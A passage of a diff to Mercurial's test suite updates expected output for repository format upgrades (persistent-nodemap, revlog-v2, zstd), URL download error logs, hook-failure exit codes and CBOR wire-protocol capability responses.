$TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for * (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ ls -1 .hg/ | grep upgradebackup [1] @@ -647,7 +688,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -679,11 +721,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) Check that the repo still works fine @@ -726,7 +766,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -759,11 +800,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -778,7 +817,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -810,11 +850,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -829,7 +867,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -861,11 +900,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -884,7 +921,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) removed: sparserevlog optimisations: re-delta-parent @@ -919,11 +957,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -940,7 +976,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog optimisations: re-delta-parent @@ -978,11 +1015,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -1007,7 +1042,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-fulladd @@ -1070,6 +1106,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1081,6 +1118,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1158,6 +1196,7 @@ > maxchainlen = 9001 > EOF $ hg config format + format.revlog-compression=$BUNDLE2_COMPRESSIONS$ format.maxchainlen=9001 $ hg debugdeltachain file rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio readsize largestblk rddensity srchunks @@ -1169,7 +1208,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-all @@ -1229,6 +1269,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -1237,7 +1278,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog processed revlogs: @@ -1249,6 +1291,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1258,7 +1301,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) removed: sparserevlog processed revlogs: @@ -1270,6 +1314,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -1284,7 +1329,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: revlog-compression-zstd, sparserevlog processed revlogs: @@ -1299,16 +1345,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zstd zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zlib zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -1320,7 +1369,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) removed: revlog-compression-zstd processed revlogs: @@ -1335,16 +1385,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1359,7 +1412,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) added: revlog-compression-zstd processed revlogs: @@ -1374,16 +1428,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zstd zstd zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -1400,10 +1457,12 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - added: exp-sidedata-flag (zstd !) - added: exp-sidedata-flag, sparserevlog (no-zstd !) + preserved: dotencode, fncache, generaldelta, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) + removed: revlogv1 + added: exp-revlogv2.2, exp-sidedata-flag (zstd !) + added: exp-revlogv2.2, exp-sidedata-flag, sparserevlog (no-zstd !) processed revlogs: - all-filelogs @@ -1417,20 +1476,22 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode + exp-revlogv2.2 exp-sidedata-flag fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) - revlogv1 sparserevlog store $ hg debugsidedata -c 0 @@ -1444,9 +1505,11 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - removed: exp-sidedata-flag + preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) + removed: exp-revlogv2.2, exp-sidedata-flag + added: revlogv1 processed revlogs: - all-filelogs @@ -1460,17 +1523,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -1487,9 +1552,11 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - added: exp-sidedata-flag + preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) + removed: revlogv1 + added: exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs @@ -1503,20 +1570,22 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode + exp-revlogv2.2 exp-sidedata-flag fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) - revlogv1 sparserevlog store $ hg debugsidedata -c 0 diff --git a/tests/test-url-download.t b/tests/test-url-download.t --- a/tests/test-url-download.t +++ b/tests/test-url-download.t @@ -34,6 +34,8 @@ $ hg debugdownload ./null.txt 1 0000000000000000000000000000000000000000 + $ cat ../error.log + Test largefile URL ------------------ @@ -66,3 +68,5 @@ $ hg debugdownload "largefile://a57b57b39ee4dc3da1e03526596007f480ecdbe8" 1 0000000000000000000000000000000000000000 $ cd .. + + $ cat error.log diff --git a/tests/test-url.py b/tests/test-url.py --- a/tests/test-url.py +++ b/tests/test-url.py @@ -275,7 +275,7 @@ def test_url(): """ >>> from mercurial import error, pycompat - >>> from mercurial.util import url + >>> from mercurial.utils.urlutil import url >>> from mercurial.utils.stringutil import forcebytestr This tests for edge cases in url.URL's parsing algorithm. Most of diff --git a/tests/test-win32text.t b/tests/test-win32text.t --- a/tests/test-win32text.t +++ b/tests/test-win32text.t @@ -38,7 +38,7 @@ transaction abort! rollback completed abort: pretxncommit.crlf hook failed - [255] + [40] $ mv .hg/hgrc .hg/hgrc.bak @@ -77,7 +77,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.crlf hook failed - [255] + [40] $ mv .hg/hgrc.bak .hg/hgrc $ echo hello > f @@ -109,7 +109,7 @@ transaction abort! rollback completed abort: pretxncommit.crlf hook failed - [255] + [40] $ hg revert -a forgetting d/f2 $ rm d/f2 @@ -286,7 +286,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.crlf hook failed - [255] + [40] $ hg log -v changeset: 5:f0b1c8d75fce diff --git a/tests/test-wireproto-caching.t b/tests/test-wireproto-caching.t --- a/tests/test-wireproto-caching.t +++ b/tests/test-wireproto-caching.t @@ -1,5 +1,10 @@ $ . $TESTDIR/wireprotohelpers.sh + +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [extensions] > blackbox = > [blackbox] diff --git a/tests/test-wireproto-command-capabilities.t b/tests/test-wireproto-command-capabilities.t --- a/tests/test-wireproto-command-capabilities.t +++ b/tests/test-wireproto-command-capabilities.t @@ -2,6 +2,13 @@ $ . $TESTDIR/wireprotohelpers.sh +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no + > EOF + $ hg init server zstd isn't present in plain builds. Make tests easier by removing @@ -150,7 +157,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -190,7 +197,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -223,7 +230,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -484,7 +491,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey